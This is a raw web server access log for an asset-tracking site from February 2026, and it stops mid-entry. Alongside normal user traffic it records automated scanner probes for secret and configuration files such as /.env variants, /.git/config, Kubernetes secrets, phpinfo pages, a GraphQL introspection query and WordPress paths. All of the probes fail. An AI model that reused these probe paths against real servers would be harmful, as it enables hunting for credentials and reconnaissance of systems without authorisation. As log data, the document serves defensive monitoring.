[Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_wdt" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__debug__/" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/webpack-dev-server" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:31 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__webpack_dev_server__/sockjs-node/info" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:31 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:31 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/info.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:31 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/phpinfo.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/test.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/i.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/php_info.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/v1/namespaces/default/secrets" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/graphql?query={__schema{types{name,fields{name}}}}" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/server-status" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/server-info" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:21:12 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:21:12 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:00:21:12 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:00:21:12 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:00:21:20 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:00:34:07 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 81.29.142.100] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 YaBrowser/21.3.3.230 Yowser/2.5 Safari/537.36" "-" -[15/Feb/2026:00:34:08 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 81.29.142.100] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15" "-" -[15/Feb/2026:00:34:09 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 81.29.142.100] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 YaBrowser/21.3.3.230 Yowser/2.5 Safari/537.36" "-" -[15/Feb/2026:00:34:09 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 81.29.142.100] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15" "-" -[15/Feb/2026:00:34:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 81.29.142.100] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 YaBrowser/21.3.3.230 Yowser/2.5 Safari/537.36" "-" -[15/Feb/2026:00:34:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 81.29.142.100] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15" "-" -[15/Feb/2026:00:34:19 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 81.29.142.6] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36" "-" -[15/Feb/2026:00:34:20 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 81.29.142.6] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "-" -[15/Feb/2026:00:34:33 +0000] - - 400 - GET http asset.hanmocnn.co.kr "/" [Client 81.29.142.6] [Length 654] [Gzip -] [Sent-to ] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 YaBrowser/21.5.1.355 Yowser/2.5 Safari/537.36" "-" -[15/Feb/2026:01:46:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:46:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:01:46:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:01:46:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:01:46:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:01:46:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:01:46:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 474] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:01:55:41 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 2.58.56.62] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:42 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 2.58.56.62] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:42 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:42 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:42 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 2.58.56.62] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//blog/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//web/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wordpress/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//website/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//news/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2018/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2019/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//shop/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp1/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//test/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:46 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//media/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:46 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp2/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:46 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//site/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:47 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//cms/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:47 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//sito/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[15/Feb/2026:01:55:47 +0000] - - 400 - - https asset.hanmocnn.co.kr "-" [Client 2.58.56.62] [Length 0] [Gzip -] [Sent-to ] "-" "-" -[15/Feb/2026:02:58:56 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:02:58:56 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:02:58:56 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:02:58:56 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:02:58:56 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:02:58:56 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 211.234.204.1] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:02:58:56 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/apple-touch-icon.png" [Client 211.234.204.1] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:02:58:56 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:02:58:56 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 211.234.204.1] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:02:59:12 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 1900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:02:59:54 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 948] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:03:00:17 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 1419] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:03:00:29 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:03:01:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 2838] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:03:42:53 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:53 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:03:42:53 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:03:42:53 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:03:42:54 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 475] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:03:46:23 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 195.178.110.132] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/%22/static/js/app.js%22" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:24 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 195.178.110.132] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:46:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.bak" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.save" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:46:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.backup" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/backend/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 